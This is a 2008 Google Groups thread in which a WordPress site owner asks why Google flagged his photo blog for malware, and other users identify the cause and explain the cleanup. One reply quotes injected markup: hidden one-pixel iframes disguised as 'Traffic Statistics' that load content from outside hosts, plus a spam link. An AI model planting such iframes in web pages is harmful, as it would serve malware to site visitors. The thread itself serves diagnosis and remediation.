Web Images Videos Maps News Shopping Gmail more »
Recently Visited Groups | Help | Sign in
Google Groups Home
Malware notification???? Where???
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  5 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
C.R.  
View profile  
 More options Feb 12 2008, 9:50 am
From: "C.R." <ned4spd8...@gmail.com>
Date: Tue, 12 Feb 2008 06:50:58 -0800 (PST)
Local: Tues, Feb 12 2008 9:50 am
Subject: Malware notification???? Where???
I got a notification for "malware" on my site.  But I don't know what
Google is thinking is malware.  I know I did not purposly put anything
up there.  And I checked the page and don't see anything.  Help!  Can
anyone tell me what Google is seeing that is malware???

My site that it's seeing the malware on is: myworthlesscrap.com/
PhotoBlog

My main site is just myworthlesscrap.com

A big thanks to anyone that can figure this one out!!!


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
SteveW  
View profile  
(1 user)  More options Feb 12 2008, 4:57 pm
From: SteveW <steve2...@yahoo.com>
Date: Tue, 12 Feb 2008 13:57:31 -0800 (PST)
Local: Tues, Feb 12 2008 4:57 pm
Subject: Re: Malware notification???? Where???
At least one page (www . myworthlesscrap . com / PhotoBlog /) has two
suspicious iframes. One is embedded in some text that says, "I've
never met such a demanding fortune cookie!", and gets its content from
http: // www . wp-stats-php . info/iframe/wp-stats.php . To research
that, do a web search on "www . wp-stats-php.info" (except remove the
spaces first). It's being talked about, including in other posts here
in this forum. The other iframe gets its content from http : //
61.132.75.71 / iframe/wp-stats.php.

On Feb 12, 6:50 am, "C.R." <ned4spd8...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
C.R.  
View profile  
 More options Feb 13 2008, 8:46 am
From: "C.R." <ned4spd8...@gmail.com>
Date: Wed, 13 Feb 2008 05:46:14 -0800 (PST)
Local: Wed, Feb 13 2008 8:46 am
Subject: Re: Malware notification???? Where???
Hmm...I'll have to look into that when I get home.  I wonder if it has
to do with word press page stats or something???

On Feb 12, 4:57 pm, SteveW <steve2...@yahoo.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Ty H  
View profile  
(2 users)  More options Feb 14 2008, 1:23 am
From: Ty H <tyhug...@gmail.com>
Date: Wed, 13 Feb 2008 22:23:54 -0800 (PST)
Local: Thurs, Feb 14 2008 1:23 am
Subject: Re: Malware notification???? Where???
C.R.:

I assume you are using WordPress.  I had the same problem with
WordPress 2.3.2.  My sites were hacked and the following code was
inserted into the posts on the home page:

<!-- Traffic Statistics --> <iframe src="http://61.132.75.71/iframe/
wp-
stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End
Traffic Statistics -->

<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/
iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

<noscript>Embora nós tenhamos &amp;lt;a href="http://www.super-
toques.com/geral-toques-para-telefone.html"&amp;gt;http://www.super-
toques.com&amp;lt;/a&amp;gt; para o mac.</noscript>

Here is how I cleaned them out.  In the WP blog, go to Site Admin and
then to Manage.  Search for "Traffic Statistics" or iframe, and also
for noscript.  Edit the postings listed in response to the searches
using the code tab, not the visual tab.  Delete the offending code.

Also, check out your list of users users.  You probably will find one
or two bogus users that you need to delete.  WordPress version 2.3.3
changes the XMLPRC.PHP file, which may fix the exploit.  See:
http://wordpress.org/development/

Good luck.

Ty H.

On Feb 13, 8:46 am, "C.R." <ned4spd8...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
C.R.  
View profile  
 More options Feb 15 2008, 10:51 am
From: "C.R." <ned4spd8...@gmail.com>
Date: Fri, 15 Feb 2008 07:51:35 -0800 (PST)
Local: Fri, Feb 15 2008 10:51 am
Subject: Re: Malware notification???? Where???
Thanks for the input.  And thanks for the search tip Ty H.  That
worked like a charm.

One question, if I upgrade to the latest version, will all my postings
be wiped?  When I tried to update my Forum a while back, it wiped the
whole thing!  Don't want to make the same mistake twice.

On Feb 14, 1:23 am, Ty H <tyhug...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google